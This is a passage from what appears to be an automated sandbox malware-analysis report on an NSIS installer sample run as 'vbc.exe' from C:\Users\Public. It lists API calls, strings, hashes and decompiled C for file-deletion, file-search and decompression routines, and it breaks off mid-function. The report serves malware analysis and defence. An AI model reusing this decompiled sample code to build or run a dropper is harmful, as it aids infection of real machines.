                          0x004033a6
                          0x004033aa
                          0x00403411
                          0x00403411
                          0x00403416
                          0x00403420
                          0x0040350b
                          0x00403511
                          0x0040351c
                          0x00403525
                          0x00403527
                          0x0040352c
                          0x0040352e
                          0x00403530
                          0x00403532
                          0x00403534
                          0x00403536
                          0x00403538
                          0x00403548
                          0x0040354a
                          0x0040354c
                          0x00403559
                          0x00403568
                          0x00403570
                          0x00403578
                          0x00403578
                          0x0040354c
                          0x00403538
                          0x00403534
                          0x0040357d
                          0x00403583
                          0x00403585
                          0x00403589
                          0x00403589
                          0x00403585
                          0x0040358e
                          0x00403593
                          0x00403596
                          0x00403598
                          0x00403598
                          0x004035a0
                          0x004035a0
                          0x0040342f
                          0x00403436
                          0x00403436
                          0x004033ac
                          0x004033b2
                          0x00403401
                          0x00403401
                          0x0040340d
                          0x00000000
                          0x0040340d
                          0x004033bb
                          0x004033c8
                          0x004033bf
                          0x004033c5
                          0x00000000
                          0x00000000
                          0x004033c7
                          0x004033c7
                          0x004033c7
                          0x004033cc
                          0x004033ce
                          0x004033d6
                          0x00403442
                          0x00403447
                          0x00403456
                          0x00000000
                          0x00000000
                          0x0040345a
                          0x00403461
                          0x00403467
                          0x0040346d
                          0x00403475
                          0x00403475
                          0x00403483
                          0x0040348a
                          0x00403493
                          0x00403499
                          0x00403499
                          0x004034a5
                          0x004034ab
                          0x004034b5
                          0x004034c9
                          0x004034ca
                          0x004034cb
                          0x004034d0
                          0x004034dc
                          0x004034e2
                          0x004034e9
                          0x004034ec
                          0x004034f2
                          0x004034f2
                          0x004034e9
                          0x004034f6
                          0x004034fc
                          0x004034fc
                          0x004034ff
                          0x00403500
                          0x00403501
                          0x00000000
                          0x00403501
                          0x004033d8
                          0x004033da
                          0x004033e5
                          0x00000000
                          0x00000000
                          0x004033ed
                          0x004033f8
                          0x004033fd
                          0x00000000
                          0x004033fd
                          0x00403379
                          0x00403385
                          0x0040338a
                          0x0040338f
                          0x00403391
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403391
                          0x00000000
                          0x0040332e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004032e2
                          0x004032e2
                          0x004032e2
                          0x004032e3
                          0x004032e3
                          0x00000000
                          0x004032e2
                          0x00000000

                          APIs
                          • #17.COMCTL32 ref: 00403244
                          • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                          • OleInitialize.OLE32(00000000), ref: 00403256
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                          • GetCommandLineA.KERNEL32(fwwmjbqpxzax Setup,NSIS Error), ref: 00403293
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004032A6
                          • CharNextA.USER32(00000000), ref: 004032D1
                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403364
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                          • DeleteFileA.KERNELBASE(1033), ref: 00403398
                          • ExitProcess.KERNELBASE(00000000), ref: 00403411
                          • OleUninitialize.OLE32 ref: 00403416
                          • ExitProcess.KERNEL32 ref: 00403436
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00403442
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 0040344E
                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                          • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                          • CopyFileA.KERNEL32 ref: 004034BF
                          • CloseHandle.KERNEL32(00000000), ref: 004034EC
                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                          • ExitProcess.KERNEL32 ref: 004035A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$"$"C:\Users\Public\vbc.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$fwwmjbqpxzax Setup$~nsu.tmp
                          • API String ID: 553446912-226143577
                          • Opcode ID: d6bb6c7e58a1b69234bdd49ec568d23efec17356feddecacbd66420c64787950
                          • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                          • Opcode Fuzzy Hash: d6bb6c7e58a1b69234bdd49ec568d23efec17356feddecacbd66420c64787950
                          • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004053AA Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 349 4053aa-4053c5 call 405659 352 4053c7-4053d9 DeleteFileA 349->352 353 4053de-4053e8 349->353 354 405572-405575 352->354 355 4053ea-4053ec 353->355 356 4053fc-40540a call 405a85 353->356 357 4053f2-4053f6 355->357 358 40551d-405523 355->358 362 405419-40541a call 4055bf 356->362 363 40540c-405417 lstrcatA 356->363 357->356 357->358 358->354 360 405525-405528 358->360 364 405532-40553a call 405d7c 360->364 365 40552a-405530 360->365 366 40541f-405422 362->366 363->366 364->354 373 40553c-405551 call 405578 call 40573d RemoveDirectoryA 364->373 365->354 369 405424-40542b 366->369 370 40542d-405433 lstrcatA 366->370 369->370 372 405438-405456 lstrlenA FindFirstFileA 369->372 370->372 374 405513-405517 372->374 375 40545c-405473 call 4055a3 372->375 385 405553-405557 373->385 386 40556a-40556d call 404e23 373->386 374->358 377 405519 374->377 383 405475-405479 375->383 384 40547e-405481 375->384 377->358 383->384 387 40547b 383->387 388 405483-405488 384->388 389 405494-4054a2 call 405a85 384->389 385->365 391 405559-405568 call 404e23 call 4057d3 385->391 386->354 387->384 393 4054f2-405504 FindNextFileA 388->393 394 40548a-40548c 388->394 399 4054a4-4054ac 389->399 400 4054b9-4054c8 call 40573d DeleteFileA 389->400 391->354 393->375 397 40550a-40550d FindClose 393->397 394->389 398 40548e-405492 394->398 397->374 398->389 398->393 399->393 402 4054ae-4054b7 call 4053aa 399->402 409 4054ea-4054ed call 404e23 400->409 410 4054ca-4054ce 400->410 402->393 409->393 412 4054d0-4054e0 call 404e23 call 4057d3 410->412 413 4054e2-4054e8 410->413 412->393 413->393
                          C-Code - Quality: 94%
                          			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x4214a0,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                          0x004053b5
                          0x004053b9
                          0x004053c2
                          0x004053c5
                          0x004053c8
                          0x004053d0
                          0x004053d2
                          0x004053d3
                          0x00000000
                          0x004053d3
                          0x004053e2
                          0x004053e2
                          0x004053e5
                          0x004053e8
                          0x004053fc
                          0x00405403
                          0x00405408
                          0x0040540a
                          0x0040541a
                          0x0040540c
                          0x00405412
                          0x00405412
                          0x0040541f
                          0x00405422
                          0x0040542d
                          0x00405433
                          0x00405438
                          0x00405448
                          0x0040544a
                          0x00405450
                          0x00405453
                          0x00405456
                          0x00405513
                          0x00405513
                          0x00405517
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00405519
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040545c
                          0x0040545c
                          0x00405465
                          0x0040546b
                          0x00405470
                          0x00405473
                          0x00405475
                          0x00405479
                          0x0040547b
                          0x0040547b
                          0x00405479
                          0x0040547e
                          0x00405481
                          0x00405494
                          0x00405496
                          0x0040549b
                          0x004054a2
                          0x004054ba
                          0x004054c0
                          0x004054c6
                          0x004054c8
                          0x004054ed
                          0x004054ca
                          0x004054ca
                          0x004054ce
                          0x004054e2
                          0x004054d0
                          0x004054d3
                          0x004054d8
                          0x004054da
                          0x004054db
                          0x004054db
                          0x004054ce
                          0x004054a4
                          0x004054aa
                          0x004054ac
                          0x004054b2
                          0x004054b2
                          0x004054ac
                          0x00000000
                          0x004054a2
                          0x00405483
                          0x00405486
                          0x00405488
                          0x00000000
                          0x00000000
                          0x0040548a
                          0x0040548c
                          0x00000000
                          0x00000000
                          0x0040548e
                          0x00405492
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004054f2
                          0x004054fc
                          0x00405502
                          0x00405502
                          0x0040550d
                          0x00000000
                          0x0040550d
                          0x00405424
                          0x0040542b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053ea
                          0x004053ea
                          0x004053ec
                          0x0040551d
                          0x00405520
                          0x00405523
                          0x00405575
                          0x00405575
                          0x00405575
                          0x00405525
                          0x00405528
                          0x00405533
                          0x00405538
                          0x0040553a
                          0x00000000
                          0x00000000
                          0x0040553d
                          0x00405543
                          0x00405549
                          0x0040554f
                          0x00405551
                          0x00000000
                          0x0040556d
                          0x00405553
                          0x00405557
                          0x00000000
                          0x00000000
                          0x0040555c
                          0x00405561
                          0x00405562
                          0x00000000
                          0x00405563
                          0x0040552a
                          0x0040552a
                          0x00000000
                          0x0040552a
                          0x004053f2
                          0x004053f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004053f6

                          APIs
                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004053C8
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405412
                          • lstrcatA.KERNEL32(?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405433
                          • lstrlenA.KERNEL32(?,?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405439
                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,?,?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 0040544A
                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 004054FC
                          • FindClose.KERNELBASE(?), ref: 0040550D
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*$\*.*
                          • API String ID: 2035342205-1934335244
                          • Opcode ID: 34c5472e85b81fd0ed43d064308d21e1862e95328fe31b5b9fae2b1a48a1451a
                          • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                          • Opcode Fuzzy Hash: 34c5472e85b81fd0ed43d064308d21e1862e95328fe31b5b9fae2b1a48a1451a
                          • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405D7C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 585 405d7c-405d90 FindFirstFileA 586 405d92-405d9b FindClose 585->586 587 405d9d 585->587 588 405d9f-405da0 586->588 587->588
                          C-Code - Quality: 100%
                          			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}




                          0x00405d87
                          0x00405d90
                          0x00000000
                          0x00405d9d
                          0x00405d93
                          0x00000000

                          APIs
                          • FindFirstFileA.KERNELBASE(?,004224E8,C:\,0040569C,C:\,C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405D87
                          • FindClose.KERNEL32(00000000), ref: 00405D93
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\$$B
                          • API String ID: 2295610775-645530273
                          • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                          • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 589 40604c-406051 590 4060c2-4060e0 589->590 591 406053-406082 589->591 594 4066b8-4066cd 590->594 592 406084-406087 591->592 593 406089-40608d 591->593 595 406099-40609c 592->595 596 406095 593->596 597 40608f-406093 593->597 598 4066e7-4066fd 594->598 599 4066cf-4066e5 594->599 600 4060ba-4060bd 595->600 601 40609e-4060a7 595->601 596->595 597->595 602 406700-406707 598->602 599->602 605 40628f-4062ad 600->605 603 4060a9 601->603 604 4060ac-4060b8 601->604 606 406709-40670d 602->606 607 40672e-40673a 602->607 603->604 610 406122-406150 604->610 608 4062c5-4062d7 605->608 609 4062af-4062c3 605->609 611 406713-40672b 606->611 612 4068bc-4068c6 606->612 616 405ed0-405ed9 607->616 614 4062da-4062e4 608->614 609->614 617 406152-40616a 610->617 618 40616c-406186 610->618 611->607 615 4068d2-4068e5 612->615 621 4062e6 614->621 622 406287-40628d 614->622 620 4068ea-4068ee 615->620 623 4068e7 616->623 624 405edf 616->624 619 406189-406193 617->619 618->619 626 406199 619->626 627 40610a-406110 619->627 643 40626c-406284 621->643 644 40686e-406878 621->644 622->605 625 40622b-406235 622->625 623->620 629 405ee6-405eea 624->629 630 406026-406047 624->630 631 405f8b-405f8f 624->631 632 405ffb-405fff 624->632 639 40687a-406884 625->639 640 40623b-406404 625->640 649 406856-406860 626->649 650 4060ef-406107 626->650 641 4061c3-4061c9 627->641 642 406116-40611c 627->642 629->615 636 405ef0-405efd 629->636 630->594 634 405f95-405fae 631->634 635 40683b-406845 631->635 637 406005-406019 632->637 638 40684a-406854 632->638 645 405fb1-405fb5 634->645 635->615 636->623 648 405f03-405f49 636->648 651 40601c-406024 637->651 638->615 639->615 640->616 646 406227 641->646 647 4061cb-4061e9 641->647 642->610 642->646 643->622 644->615 645->631 653 405fb7-405fbd 645->653 646->625 654 406201-406213 647->654 655 4061eb-4061ff 647->655 656 405f71-405f73 648->656 657 405f4b-405f4f 648->657 649->615 650->627 651->630 651->632 660 405fe7-405ff9 653->660 661 405fbf-405fc6 653->661 662 406216-406220 654->662 655->662 658 405f81-405f89 656->658 659 405f75-405f7f 656->659 663 405f51-405f54 GlobalFree 657->663 664 405f5a-405f68 GlobalAlloc 657->664 658->645 659->658 659->659 660->651 665 405fd1-405fe1 GlobalAlloc 661->665 666 405fc8-405fcb GlobalFree 661->666 662->641 667 406222 662->667 663->664 664->623 668 405f6e 664->668 665->623 665->660 666->665 670 406862-40686c 667->670 671 4061a8-4061c0 667->671 668->656 670->615 671->641
                          C-Code - Quality: 98%
                          			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
